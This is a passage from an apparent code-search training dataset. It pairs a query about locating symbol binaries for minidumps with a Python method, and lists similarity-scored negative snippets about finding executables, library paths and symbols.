horde_cleanup(self):" ]
[ "0.5797563", "0.53851175", "0.5382028", "0.5153331", "0.4875175", "0.48596218", "0.47921395", "0.4589166", "0.45467687", "0.45267266", "0.45106924", "0.44272697", "0.441203", "0.43683136", "0.43274632", "0.43264234", "0.43178105", "0.43031862", "0.43031862", "0.42946658", "0.42870143", "0.42786124", "0.42674002", "0.42580718", "0.42565688", "0.42432654", "0.42379734", "0.42342746", "0.42235175", "0.42225", "0.42204675", "0.42199293", "0.42064625", "0.41788673", "0.41781178", "0.41768244", "0.41718787", "0.41611782", "0.41535166", "0.41517496", "0.4148658", "0.41459236", "0.4144224", "0.41300374", "0.41289657", "0.4124308", "0.40852118", "0.4083701", "0.4076595", "0.4075873", "0.40754977", "0.40588358", "0.40566203", "0.4054296", "0.40534574", "0.40534574", "0.40534574", "0.40430617", "0.40386978", "0.40319353", "0.40309614", "0.40280017", "0.40280017", "0.40195665", "0.4017166", "0.40160233", "0.40148652", "0.40083423", "0.40069604", "0.40048748", "0.40047914", "0.40042943", "0.40000632", "0.39996386", "0.39992785", "0.39989924", "0.3996089", "0.39903298", "0.39888784", "0.39792103", "0.3974279", "0.39740086", "0.39704606", "0.39659464", "0.39656046", "0.39638522", "0.3956545", "0.39533737", "0.39532027", "0.39524335", "0.39523116", "0.39461637", "0.39435205", "0.39415187", "0.3937768", "0.39342228", "0.39285588", "0.39218563", "0.3921025", "0.39184237" ]
0.6551352
0
Returns a list of paths to binaries where symbols may be located.
def GetSymbolBinaries(self, minidump):
    libraries = self._ExtractLibraryNamesFromDump(minidump)
    symbol_binary_dir = self._GetSymbolBinaryDirectory(minidump, libraries)
    if not symbol_binary_dir:
      return []

    return [os.path.join(symbol_binary_dir, lib) for lib in libraries]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def find_binaries():\n\n builddir = Path(__file__).parent.parent / \"builddir\"\n\n bins = []\n\n for folder in [\"examples\", \"tests\", \"tools\"]:\n for path in sorted((builddir / folder).rglob(\"*\")):\n if path.stem.startswith(\"xnvme_single\"):\n continue\n if path.stem.startswith(\"xnvme_dev\"):\n continue\n if path.stem.startswith(\"xnvme_enum\"):\n continue\n if path.is_file() and path.stat().st_mode & os.X_OK:\n bins.append(path.name)\n\n return bins", "def _GetDefaultBinPathExcludes(self):\n if sys.platform == \"win32\":\n import cx_Freeze.util\n systemDir = cx_Freeze.util.GetSystemDir()\n windowsDir = cx_Freeze.util.GetWindowsDir()\n return [windowsDir, systemDir, os.path.join(windowsDir, \"WinSxS\")]\n elif sys.platform == \"darwin\":\n return [\"/lib\", \"/usr/lib\", \"/System/Library/Frameworks\"]\n else:\n return [\"/lib\", \"/lib32\", \"/lib64\", \"/usr/lib\", \"/usr/lib32\",\n \"/usr/lib64\"]", "def dir_bin():\n return abspath('bin')", "def _GetSymbolBinaryDirectory(self, minidump, libraries):\n if minidump in self._minidump_symbol_binaries_directories:\n return self._minidump_symbol_binaries_directories[minidump]\n\n # Get the processor architecture reported by the minidump.\n arch = None\n matcher = re.compile(_PROCESSOR_ARCH_REGEX)\n for line in self._GetMinidumpDumpOutput(minidump).splitlines():\n match = matcher.match(line)\n if match:\n arch = match.groupdict()['arch'].lower()\n break\n if not arch:\n logging.error('Unable to find processor architecture for minidump %s',\n minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n if arch not in _BREAKPAD_ARCH_TO_FILE_REGEX:\n logging.error(\n 'Unsupported processor architecture %s for minidump %s. This is '\n 'likely fixable by adding the correct mapping for the architecture '\n 'in android_minidump_symbolizer._BREAKPAD_ARCH_TO_FILE_REGEX.',\n arch, minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n\n # Look for a directory that contains binaries with the correct architecture.\n matcher = re.compile(_BREAKPAD_ARCH_TO_FILE_REGEX[arch])\n symbol_dir = None\n for symbol_subdir in _POSSIBLE_SYMBOL_BINARY_DIRECTORIES:\n possible_symbol_dir = os.path.join(self._build_dir, symbol_subdir)\n if not os.path.exists(possible_symbol_dir):\n continue\n for f in os.listdir(possible_symbol_dir):\n if f not in libraries:\n continue\n binary_path = os.path.join(possible_symbol_dir, f)\n stdout = subprocess.check_output(\n ['file', binary_path], stderr=subprocess.STDOUT)\n if matcher.match(stdout):\n symbol_dir = possible_symbol_dir\n break\n\n if not symbol_dir:\n logging.error(\n 'Unable to find suitable symbol binary directory for architecture %s.'\n 'This is likely fixable by adding the correct directory to '\n 'android_minidump_symbolizer._POSSIBLE_SYMBOL_BINARY_DIRECTORIES.',\n arch)\n self._minidump_symbol_binaries_directories[minidump] = symbol_dir\n return symbol_dir", "def get_symbols(obj_path):\n cmd = ['nm', obj_path]\n res = subprocess.run(cmd, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, check=True)\n\n return res.stdout.decode()", "def buildExecutablesList( path ):\n\n result = []\n for item in os.listdir( path ):\n candidate = path + item\n if not os.path.islink( candidate ):\n continue # Not a symlink at all\n if not os.path.exists( candidate ):\n logging.warning( \"Broken symlink detected: \" + candidate )\n continue # Broken link\n if not os.access( candidate, os.X_OK ):\n logging.warning( \"Symlink to a non-executable file: \" + candidate 
)\n continue # No permissions to execute\n\n result.append( candidate )\n return result", "def locate_scripts():\n scripts = []\n bin_dir = os.path.join(os.getcwd(), 'bin')\n if not os.path.isdir(bin_dir):\n return scripts\n for item in os.listdir(bin_dir):\n full_path = os.path.join(bin_dir, item)\n if os.path.isfile(full_path):\n with open(full_path) as f:\n first_line = next(f)\n if first_line.startswith('#!'):\n scripts.append(full_path)\n return scripts", "def _binaries_to_symbolize(self):\n raise NotImplementedError()", "def getpaths(self,libname):\n if os.path.isabs(libname):\n yield libname\n else:\n # FIXME / TODO return '.' and os.path.dirname(__file__)\n for path in self.getplatformpaths(libname):\n yield path\n\n path = ctypes.util.find_library(libname)\n if path: yield path", "def getpaths(self,libname):\n if os.path.isabs(libname):\n yield libname\n else:\n # FIXME / TODO return '.' and os.path.dirname(__file__)\n for path in self.getplatformpaths(libname):\n yield path\n\n path = ctypes.util.find_library(libname)\n if path: yield path", "def filepaths(self) -> Dict[str, 'BinPackageFile']:\n return self._get_package_files()", "def binaries_path(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def get_symbols(self):\n symbols = os.environ.get('SYMBOLS', 'btc,eth')\n if not symbols:\n return 'btc,eth'\n return symbols", "def pathext_list():\n return (os.environ.get(\"PATHEXT\") or \"\").split(os.pathsep)", "def find_all_pythons():\n \n allpys = []\n \n # split PATH according to platform rules\n pathlist = string.split( os.environ['PATH'], os.pathsep )\n\n # search PATH, excluding nonexistant dirs\n for path in filter( os.path.isdir, pathlist ):\n allpys.extend( find_pythons_in_dir( path ) )\n\n # check the win32 registry, as appropriate\n allpys.extend( get_pythons_from_registry() )\n\n # and of course I'm running under a Python, in case\n # no others were found\n allpys.append( os.path.abspath(sys.executable) )\n \n return allpys", "def path_list():\n return (os.environ.get(\"PATH\", None) or os.defpath).split(os.pathsep)", "def _executable_names(executable):\n\n if os.name == 'nt':\n pathext = os.environ.get('PATHEXT', '').split(os.pathsep)\n for ext in pathext:\n yield executable + ext\n\n else:\n yield executable", "def binpath(self):\n return self._query_config()['binpath']", "def get_path(self):\r\n path = [\"/bin\", \"/usr/bin\", \"/usr/local/bin\"]\r\n if \"PATH\" in os.environ:\r\n p = os.environ[\"PATH\"]\r\n if p:\r\n path = p.split(os.pathsep)\r\n return path", "def build_filelist(basepath):\n log.info(\"Building list of files containing EDM symbols in %s\", basepath)\n symbol_files = []\n for dir_path, _, filenames in os.walk(basepath):\n for filename in filenames:\n filepath = os.path.join(dir_path, filename)\n if filename.endswith(\".opi\") and utils.grep(filepath, \"EDM Symbol\"):\n symbol_files.append(filepath)\n\n return symbol_files", "def binpath(self):\n return self.__bin", "def binaries(gmxpath, gmxsuff):\n def gmx_path(binary_path):\n return os.path.join(gmxpath, binary_path + gmxsuff)\n\n if which('gmx_d'):\n logger.debug(\"Using double precision binaries for gromacs\")\n main_binary = gmx_path('gmx_d')\n grompp_bin = [main_binary, 'grompp']\n mdrun_bin = [main_binary, 'mdrun']\n genergy_bin = [main_binary, 'energy']\n elif which('grompp_d') and which('mdrun_d') and which('g_energy_d'):\n logger.debug(\"Using double precision binaries\")\n grompp_bin = [gmx_path('grompp_d')]\n mdrun_bin = [gmx_path('mdrun_d')]\n genergy_bin = 
[gmx_path('g_energy_d')]\n elif which('gmx'):\n logger.debug(\"Using double precision binaries\")\n main_binary = gmx_path('gmx')\n grompp_bin = [main_binary, 'grompp']\n mdrun_bin = [main_binary, 'mdrun']\n genergy_bin = [main_binary, 'energy']\n elif which('grompp') and which('mdrun') and which('g_energy'):\n logger.debug(\"Using single precision binaries\")\n grompp_bin = [gmx_path('grompp')]\n mdrun_bin = [gmx_path('mdrun')]\n genergy_bin = [gmx_path('g_energy')]\n else:\n raise IOError('Unable to find gromacs executables.')\n return grompp_bin, mdrun_bin, genergy_bin", "def syspaths(self):\n res = []\n for path, jsmodule in self.jsmodules.items():\n if jsmodule.js_lib_path != \"\":\n js_lib_path = os.path.dirname(jsmodule.js_lib_path.rstrip(\"/\")) # get parent\n if not js_lib_path in res:\n res.append(js_lib_path)\n return res", "def get_rpaths(pkg):\n rpaths = [pkg.prefix.lib, pkg.prefix.lib64]\n deps = get_rpath_deps(pkg)\n rpaths.extend(d.prefix.lib for d in deps if os.path.isdir(d.prefix.lib))\n rpaths.extend(d.prefix.lib64 for d in deps if os.path.isdir(d.prefix.lib64))\n # Second module is our compiler mod name. We use that to get rpaths from\n # module show output.\n if pkg.compiler.modules and len(pkg.compiler.modules) > 1:\n rpaths.append(path_from_modules([pkg.compiler.modules[1]]))\n return list(dedupe(filter_system_paths(rpaths)))", "def get_rpaths(dylib_path):\n load_cmds = get_load_commands(dylib_path)\n rpath_cmds = filter(lambda cmd: cmd.name == 'LC_RPATH', load_cmds)\n path_re = re.compile('path (?P<rpath>.*) \\(.*\\)')\n\n rpaths = []\n for cmd in rpath_cmds:\n for line in cmd.lines:\n match = path_re.search(line)\n if match:\n rpaths.append(match.group('rpath'))\n return rpaths", "def library_search_path(self, pedantic=False):\n return []", "def path_to_bin_files(path):\r\n files_list=list_of_files(path)\r\n for file in files_list:\r\n asm_lines = parse_data(file)\r\n symbols_dict = init_symbols_dictionary()\r\n collect_symbols_and_ignore_coments(asm_lines, symbols_dict)\r\n bin_lines = translate_to_binary(asm_lines, symbols_dict)\r\n create_output(bin_lines, file)", "def bin_search(binary):\n if sys.platform == 'win32':\n # Directory containing 'binary' should be in PATH\n return binary\n result = None\n mode = os.R_OK | os.X_OK\n for p in bin_search_path:\n path = join(p, binary)\n if os.access(path, mode) == 1:\n result = path\n break\n else:\n raise MissingBinary('Unable to find binary \"%s\"' % binary)\n return result", "def _GetDefaultBinIncludes(self):\n if sys.platform == \"win32\":\n pythonDll = \"python%s%s.dll\" % sys.version_info[:2]\n return [pythonDll, \"gdiplus.dll\", \"mfc71.dll\", \"msvcp71.dll\",\n \"msvcr71.dll\"]\n else:\n soName = distutils.sysconfig.get_config_var(\"INSTSONAME\")\n if soName is None:\n return []\n pythonSharedLib = self._RemoveVersionNumbers(soName)\n return [pythonSharedLib]", "def get_roots(self):\n roots = []\n for symbol in self.GlobalSymbolDict.values():\n if symbol.isRoot():\n roots += [symbol]\n return roots", "def _whicha(cmd, paths=None):\n import os\n if paths is None:\n paths = os.environ['PATH'].split(':')\n possibilities = [os.path.expanduser(os.path.join(p, cmd)) for p in paths]\n return filter(lambda bin: os.path.exists(bin), possibilities)", "def lookForQueueingCommands():\n for queue, binary in queueBinaryMap.items():\n if checkForBinary(binary):\n return queue\n else:\n raise Exception(\"Cannot locate a queueing system. 
None of these executables were found in your PATH: %s\" % (queueBinaryMap.values(),))", "def _jupyter_nbextension_paths():\n return [{\n \"section\": \"tree\",\n \"dest\": \"nbsysinfo\",\n \"src\": \"static\",\n \"require\": \"nbsysinfo/main\"\n }]", "def get_binaries(name_only=False):\n\n bins = list()\n\n dtf_db = sqlite3.connect(DTF_DB)\n cur = dtf_db.cursor()\n\n # This just returns the name\n if name_only:\n\n sql = ('SELECT name '\n 'FROM binaries ')\n\n for binary in cur.execute(sql):\n bins.append(binary[0])\n\n # This returns a list of items\n else:\n\n sql = ('SELECT name, version, '\n 'about, author '\n 'FROM binaries '\n 'ORDER BY name')\n\n cur.execute(sql)\n\n while True:\n\n item = dtf.core.item.Item()\n line = cur.fetchone()\n if line is None:\n break\n\n item.type = dtf.core.item.TYPE_BINARY\n item.name = line[0]\n item.version = line[1]\n item.about = line[2]\n item.author = line[3]\n\n bins.append(item)\n\n return bins", "def lib_dirs(self):\r\n ret = []\r\n for x in [y.type for y in self.variables] + [\r\n y.op for y in self.node_order]:\r\n try:\r\n ret += x.c_lib_dirs()\r\n except utils.MethodNotDefined:\r\n pass\r\n return utils.uniq(ret)", "def pdbfile_list():\n import glob, os\n os.chdir(\"../Data\")\n file_list = []\n for file in glob.glob(\"*.pdb\"):\n file_list.append(file)\n return file_list", "def get_platform_und_symbols():\n ret = None\n if osname_is_freebsd():\n ret = sorted([\"environ\", \"__progname\"])\n if is_verbose():\n print(\"Checking for required UND symbols... \" + str(ret))\n return ret", "def FindMissingBinaries(needed_tools):\n return [binary for binary in needed_tools if Which(binary) is None]", "def get_installation_paths(versions=None):\n\n pass", "def DumpSymbols(lib_path, dump_path):\n elf_parser = ExternalModules.elf_parser\n parser = None\n try:\n parser = elf_parser.ElfParser(lib_path)\n symbols = parser.ListGlobalDynamicSymbols()\n finally:\n if parser:\n parser.Close()\n if not symbols:\n return \"No symbols\"\n symbols.sort()\n with open(dump_path, \"w\") as dump_file:\n dump_file.write(\"\\n\".join(symbols) + \"\\n\")\n return \"Output: \" + dump_path", "def pdbfile_list():\n \n import glob, os\n os.chdir(\"../Data\")\n file_list = []\n for file in glob.glob(\"*.pdb\"):\n file_list.append(file)\n return file_list", "def bin_search(binary, default=_marker):\n mode = os.R_OK | os.X_OK\n envPath = os.environ['PATH']\n customPath = os.environ.get('BIBUTILS_PATH', '')\n searchPath = os.pathsep.join([customPath, envPath])\n bin_search_path = [path for path in searchPath.split(os.pathsep)\n if os.path.isdir(path)]\n\n if sys.platform == 'win32':\n extensions = ('.exe', '.com', '.bat', )\n else:\n extensions = ()\n\n for path in bin_search_path:\n for ext in ('', ) + extensions:\n pathbin = os.path.join(path, binary) + ext\n if os.access(pathbin, mode) == 1:\n return pathbin\n\n if default is _marker:\n raise MissingBinary('Unable to find binary \"%s\" in %s w' %\n (binary, os.pathsep.join(bin_search_path)))\n else:\n return default", "def syspaths(self):\n return self._syspaths", "def syspaths(self):\n return self._syspaths", "def syspaths(self):\n return self._syspaths", "def get_binaries(kdb,entry):\n xml = objectify.fromstring(entry.dump_xml())\n binaries = list(xml.xpath('./Binary'))\n for binary in binaries:\n yield (binary.Key.text, Binary(kdb,binary))", "def __add_paths(self, config):\n bin_path = os.path.join(\n self.directory.install_directory(self.feature_name), \"bin\"\n )\n whitelist_executables = 
self._get_whitelisted_executables(config)\n for f in os.listdir(bin_path):\n for pattern in BLACKLISTED_EXECUTABLES:\n if re.match(pattern, f):\n continue\n if whitelist_executables and f not in whitelist_executables:\n continue\n self.directory.symlink_to_bin(f, os.path.join(bin_path, f))", "def find_binary_in_path(filename: str) -> str:\n if \"PATH\" not in os.environ:\n raise PATHNotFoundError\n for directory in os.environ[\"PATH\"].split(os.pathsep):\n binary = os.path.abspath(os.path.join(directory, filename))\n if os.path.isfile(binary) and os.access(binary, os.X_OK):\n return binary\n raise BinaryNotFoundError", "def GetWorkloadFileList() -> list[str]:\n return [data.ResourcePath(workload) for workload in FLAGS.ycsb_workload_files]", "def get_scripts():\n scripts = []\n if os.path.isdir('bin'):\n scripts = [fname for fname in glob.glob(os.path.join('bin', '*'))\n if not os.path.basename(fname).endswith('.rst')]\n return scripts", "def FindBinary(module_space, bin_name):\n if not bin_name:\n return None\n if bin_name.startswith(\"//\"):\n # Case 1: Path is a label. Not supported yet.\n raise AssertionError(\n \"Bazel does not support execution of Python interpreters via labels yet\"\n )\n elif os.path.isabs(bin_name):\n # Case 2: Absolute path.\n return bin_name\n # Use normpath() to convert slashes to os.sep on Windows.\n elif os.sep in os.path.normpath(bin_name):\n # Case 3: Path is relative to the repo root.\n return os.path.join(module_space, bin_name)\n else:\n # Case 4: Path has to be looked up in the search path.\n return SearchPath(bin_name)", "def extract_gcc_binaries():\n patterns = [\n \"/opt/local/bin/g++-mp-[0-9]*.[0-9]*\",\n \"/opt/local/bin/g++-mp-[0-9]*\",\n \"/usr/local/bin/g++-[0-9]*.[0-9]*\",\n \"/usr/local/bin/g++-[0-9]*\",\n ]\n if platform.system() == \"Darwin\":\n gcc_binaries = []\n for pattern in patterns:\n gcc_binaries += glob.glob(pattern)\n gcc_binaries.sort()\n if gcc_binaries:\n _, gcc = os.path.split(gcc_binaries[-1])\n return gcc\n else:\n return None\n else:\n return None", "def get_scripts():\n scripts = []\n if os.path.isdir('bin'):\n scripts = [ fname for fname in glob.glob(os.path.join('bin', '*'))\n if not os.path.basename(fname).endswith('.rst') ]\n return scripts", "def find_symbols(self, **kw):\n return list(self.ifind_symbols(**kw))", "def get_basic_search_subdirs(afile):\n if os.path.exists(afile):\n elf_class = get_elf_class(afile)\n if \"ELF32\" == elf_class:\n # Do not search lib64 dir for 32bit binary file\n return ['', 'bin', 'sbin', 'lib', 'usr/bin', 'usr/sbin', 'usr/lib']\n return ['', 'bin', 'sbin', 'lib64', 'usr/bin', 'usr/sbin', 'usr/lib64', 'lib', 'usr/lib']", "def get_symbols(self, type_name):\n return self._symtab[type_name].get_symbols()", "def available_binary_choices() -> Iterable[str]:\n for name, _ in inspect.getmembers(sys.modules[__name__], inspect.isclass):\n if name.startswith('Binary'):\n yield name", "def _GetDefaultBinExcludes(self):\n if sys.platform == \"win32\":\n return [\"comctl32.dll\", \"oci.dll\", \"cx_Logging.pyd\"]\n else:\n return [\"libclntsh.so\", \"libwtc9.so\"]", "def get_data_files():\n return [\n ('share/jupyter/nbextensions/{}'.format(PY_PACKAGE), TARGETS),\n ('share/jupyter/lab/extensions', [\n os.path.relpath(f, '.') for f in glob.glob(TAR_PATH)\n ])\n ]", "def selected_lib_roots(args: Namespace) -> List[str]:\n return [LIB_ROOTS[lib] for lib in selected_libs(args)]", "def get_paths_from(self, symbol):\n to_return = []\n visitation_queue = [self.head]\n while len(visitation_queue) != 0:\n 
visiting = visitation_queue.pop(0)\n for elem in visiting.children:\n visitation_queue.append(elem)\n if symbol in visiting.inputs:\n v = visiting\n model_trail = []\n while v.parent is not None:\n model_trail.append(v.m)\n v = v.parent\n to_return.append(SymbolPath(visiting.inputs, model_trail))\n return to_return", "def loaded_modules() -> List[str]:\n return PYSTAC_IO.keys()", "def get_symbols_list(self):\n return self.symbols_list", "def discover_new_binaries(self):\n # get new binaries from the discovery cpfs, if any\n if not self._plugins_used:\n return []\n\n plugins_bins = [pl.discover_new_binaries() for pl in self._plugins_used]\n return [item for bins in plugins_bins for item in bins]", "def find_symbols(lst):\n ret = []\n for ii in lst:\n ret += [find_symbol(ii)]\n return ret", "def find(cls, paths):\r\n pythons = []\r\n for path in paths:\r\n for fn in cls.expand_path(path):\r\n basefile = os.path.basename(fn)\r\n if any(matcher.match(basefile) is not None for matcher in cls.REGEXEN):\r\n try:\r\n pythons.append(cls.from_binary(fn))\r\n except Exception as e:\r\n TRACER.log('Could not identify %s: %s' % (fn, e))\r\n continue\r\n return pythons", "def get_reference_binary():\n return \"./Binary/linux-x64/astcenc\"", "def get_existing_symbols():\n instruments = pyRofex.get_all_instruments()[\"instruments\"]\n existing_symbols = []\n for instrument in instruments:\n existing_symbols.append(instrument[\"instrumentId\"][\"symbol\"])\n return existing_symbols", "def get_all_symbols(kem_dirs):\n symbols = set()\n\n for kd in kem_dirs:\n for obj_path in filter_object_files(find_object_files(kd)):\n for symbol in filter_symbols(get_symbols(obj_path)):\n symbols.add(symbol)\n\n if symbols:\n return symbols\n\n raise oqs.KemException('No symbols found')", "def binary_location(cmd, USE_PATH=False):\n return os.path.join(BIN_PREFIX, cmd)", "def _extract_system_path(self, script):\r\n\r\n DEFAULT_PATH = ['code']\r\n\r\n # Separate paths by :, like the system path.\r\n raw_path = script.get('system_path', '').split(\":\") + DEFAULT_PATH\r\n\r\n # find additional comma-separated modules search path\r\n path = []\r\n\r\n for dir in raw_path:\r\n if not dir:\r\n continue\r\n\r\n # path is an absolute path or a path relative to the data dir\r\n dir = os.path.join(self.capa_system.filestore.root_path, dir)\r\n # Check that we are within the filestore tree.\r\n reldir = os.path.relpath(dir, self.capa_system.filestore.root_path)\r\n if \"..\" in reldir:\r\n log.warning(\"Ignoring Python directory outside of course: %r\", dir)\r\n continue\r\n\r\n abs_dir = os.path.normpath(dir)\r\n path.append(abs_dir)\r\n\r\n return path", "def SearchPath(name, path=None):\n path = path or os.environ['PATH']\n for dir in path.split(os.pathsep):\n binpath = os.path.join(dir, name)\n if os.path.exists(binpath):\n return os.path.abspath(binpath)\n return None", "def GetFilesForTool(self):\n return ['tools/valgrind/android/vg-chrome-wrapper-tsan.sh',\n 'tools/valgrind/tsan/suppressions.txt',\n 'tools/valgrind/tsan/suppressions_android.txt',\n 'tools/valgrind/tsan/ignores.txt']", "def get_entry_points():\n ret = []\n\n # global roots\n ret.extend(get_globals())\n # dynamic global roots\n ret.extend(get_dyn_globals())\n # stacks and local roots\n ret.extend(walk_ocaml_stacks())\n\n # global C roots\n ret.extend(get_global_roots(\"caml_global_roots\"))\n ret.extend(get_global_roots(\"caml_global_roots_young\"))\n ret.extend(get_global_roots(\"caml_global_roots_old\"))\n\n # finalised values\n 
ret.extend(get_final_roots())\n\n # scan_roots_hook\n traverse_scan_roots_hook()\n return ret", "def get_exec_path(self):\n bin_name = 'test_hint_time'\n # Look for in place build\n script_dir = os.path.dirname(os.path.realpath(__file__))\n bin_path = os.path.join(script_dir, '.libs', bin_name)\n if not os.path.exists(bin_path):\n # Look for out of place build from using apps/build_func.sh\n int_dir = os.path.dirname(script_dir)\n bin_path_op = os.path.join(int_dir, 'build/integration/test/.libs', bin_name)\n if not os.path.exists(bin_path_op):\n msg = 'Could not find application binary, tried \\n \"{}\"\\n \"{}\"'.format(\n bin_path, bin_path_op)\n raise RuntimeError(msg)\n bin_path = bin_path_op\n return bin_path", "def get_candidate_paths():\n yield get_linked_libpython()\n\n # List candidates for directories in which libpython may exist\n config_vars = \"LIBPL\", \"srcdir\", \"LIBDIR\"\n lib_dirs = list(map(sysconfig.get_config_var, config_vars))\n\n if is_windows():\n lib_dirs.append(os.path.join(os.path.dirname(sys.executable)))\n else:\n lib_dirs.append(os.path.join(\n os.path.dirname(os.path.dirname(sys.executable)),\n \"lib\"))\n\n # For macOS:\n lib_dirs.append(sysconfig.get_config_var(\"PYTHONFRAMEWORKPREFIX\"))\n\n lib_dirs.append(sys.exec_prefix)\n lib_dirs.append(os.path.join(sys.exec_prefix, \"lib\"))\n\n lib_basenames = list(get_candidate_names())\n\n for directory in filter(bool, lib_dirs):\n for basename in lib_basenames:\n yield os.path.join(directory, basename)\n\n # In macOS and Windows, ctypes.util.find_library returns a full path:\n for basename in lib_basenames:\n yield ctypes.util.find_library(get_library_name(basename))", "def list_syms():\n\tSymStringVec=[];\n\tSymStringVec.append(\"CSYM\");\n\tSymStringVec.append(\"DSYM\");\n\tSymStringVec.append(\"TET_SYM\");\n\tSymStringVec.append(\"OCT_SYM\");\n\tSymStringVec.append(\"ICOS_SYM\");\n\tSymStringVec.append(\"ISYM\");\n\treturn SymStringVec", "def gyp_files(self):\n return set(self._gyp_flags.keys())", "def scan_path(executable=\"mongod\"):\n for path in os.environ.get(\"PATH\", \"\").split(\":\"):\n path = os.path.abspath(path)\n executable_path = os.path.join(path, executable)\n if os.path.exists(executable_path):\n return executable_path", "def binary_bases(cls):\n return cls._BINARY_BASES", "def get_package_list():\n pip_freeze = subprocess.check_output(('pip', 'freeze')).decode('utf8')\n package_list = [x.strip().split('==') for x in pip_freeze.split('\\n') if x.find('==') != -1]\n package_list = [(x[0].lower(), x[1]) for x in package_list]\n return package_list", "def GetFilesForTool(self):\n return ['tools/valgrind/android/vg-chrome-wrapper.sh',\n 'tools/valgrind/memcheck/suppressions.txt',\n 'tools/valgrind/memcheck/suppressions_android.txt']", "def parse_paths():\r\n sources = get_source_paths()\r\n results = collections.defaultdict(list)\r\n for root_dir in sources:\r\n\r\n for script_type, dirs in walkdirs(root_dir).iteritems():\r\n\r\n for d in dirs:\r\n logger.debug(d)\r\n\r\n # Add paths to environments\r\n if os.path.basename(d).lower().startswith(ICONS):\r\n results['XBMLANGPATH'].append(d)\r\n os.environ['XBMLANGPATH'] += os.pathsep + d\r\n\r\n if script_type == 'mel':\r\n results['MAYA_SCRIPT_PATH'].append(d)\r\n os.environ['MAYA_SCRIPT_PATH'] += os.pathsep + d\r\n else:\r\n results['PYTHONPATH'].append(d)\r\n site.addsitedir(d)\r\n return results", "def get_password_binaries_array(password):\r\n password_binary_array = []\r\n\r\n # Create array of binaries from the password\r\n for character in 
password:\r\n password_binary_array.append(get_binary(character))\r\n\r\n # Join it together for parsing\r\n binary = \"\".join(password_binary_array)\r\n\r\n # Start the array off with the actual padded password binary\r\n rebuild_binaries = [binary]\r\n\r\n # This loops through the binary string, reducing it by\r\n # one (in length) with each pass appending string to array\r\n # Stops once the binary length is 1 (one)\r\n while len(binary) > 1:\r\n # Use the function logic to reduce the binary by one based on simple logic\r\n binary = binary_reduction(binary)\r\n # Add that new binary to this array for later usage\r\n rebuild_binaries.append(binary)\r\n\r\n return rebuild_binaries", "def print_symbols():\n\n global program\n if program is None:\n print \"no program is loaded\"\n return\n for(s, a) in program.symbols():\n print \"0x{:x} : {}\".format(a, s)", "def symbols(self) -> List[SingleMapping]:\n return self._symbols", "def list_symbol_tables(mst):\n stlist = []\n def append_st(st):\n #print(st)\n stlist.append(st)\n for s in st.get_symbols():\n for ns in s.get_namespaces():\n append_st(ns)\n if not isinstance(mst, symtable.SymbolTable):\n # Assume it is text of a program to compile\n mst = symtable.symtable(mst, '<string>', 'exec')\n append_st(mst)\n return stlist", "def syspath():\n import sys\n pprint(sys.path)", "def _get_paths():\n paths = [\n '/'\n ]\n return paths", "def storer_paths():\n return [dir_unchecked(), dir_checked(),\n dir_backup(), dir_tests()]", "def getSourcePaths(self, makeGlyphs=True, makeKerning=True, makeInfo=True):\n paths = []\n for name in self.sources.keys():\n paths.append(self.sources[name][0].path)\n return paths", "def _jupyter_nbextension_paths():\n return [{\n \"section\": \"notebook\",\n \"dest\": \"nbresuse\",\n \"src\": \"static\",\n \"require\": \"nbresuse/main\"\n }]", "def find_executable(*names: str,\n additional_roots: Iterable[Path] = (),\n additional_files: Iterable[Path] = ())-> Optional[Path]:\n for path in additional_files:\n if path_is_executable(path):\n return path\n\n for root in chain(additional_roots, os.get_exec_path()):\n root = Path(root)\n for name in names:\n path = root / name\n if path_is_executable(path):\n return path\n return None", "def get_breakpoint_files(self):\r\n return self.bpoints.values(key='filename')", "def get_all_setups_roots():\n ta_roots = cmds.ls(\"*.{}\".format(CONFIG[\"config_attr\"]), r=True, o=True)\n return ta_roots", "def gather_binaries():\n # Query git for all Rust versions released and store freshly built binaries\n # for those in BINDIR\n tags = [tag.decode() for tag in subprocess.check_output([\"git\", \"tag\"]).split()]\n tags.remove(\"PRERELEASE\")\n\n # Ignore Ruby tags\n rust_tags = list(filter(lambda tag: not tag.startswith(\"0\"), tags))\n rust_tags = list(filter(lambda tag: not tag.startswith(\"1\"), rust_tags))\n\n # Just do the three last releases\n rust_tags = list(sorted(rust_tags, key=natural_keys))[-3:]\n\n # Make sure we binaries for older versions\n with tempfile.TemporaryDirectory(prefix=\"riff-benchmark\") as clonedir:\n subprocess.run([\"git\", \"clone\", \"-b\", \"master\", \".\", clonedir], check=True)\n\n build_latest_commit(clonedir)\n\n for tag in rust_tags:\n binary_name = os.path.join(BINDIR, f\"riff-{tag}\")\n if os.path.isfile(binary_name):\n continue\n\n print()\n print(f\"Building missing binary: {binary_name}\")\n build_binary(clonedir, tag, binary_name)\n\n # Build the current version\n print()\n print(\"Building current sources...\")\n cargo_build()\n 
shutil.copy(\"target/release/riff\", os.path.join(BINDIR, \"riff-current\"))", "def calculate_compile_roots(targets, is_thrift_target):\r\n\r\n basedirs, sources = calculate_compile_sources(targets, is_thrift_target)\r\n sources = find_root_thrifts(basedirs, sources)\r\n return basedirs, sources", "def find_brew_binary_location(package_folder, search_string):\n match_str = '/usr/local/Cellar/%s/**/*%s*' % (package_folder,\n search_string)\n paths = glob.glob(match_str, recursive=True)\n for path in paths:\n if os.access(path, os.X_OK):\n return path\n return None", "def get_bin_dir():\n return os.path.abspath(os.path.join(get_root_dir(), 'bin/'))", "def extract_symbols(lib_file, static_lib=None):\n if static_lib is None:\n static_lib = is_static_library(lib_file)\n if sys.platform.startswith('aix'):\n extractor = AIXDumpExtractor(static_lib=static_lib)\n elif ReadElfExtractor.find_tool() and not static_lib:\n extractor = ReadElfExtractor(static_lib=static_lib)\n else:\n extractor = NMExtractor(static_lib=static_lib)\n return extractor.extract(lib_file)" ]
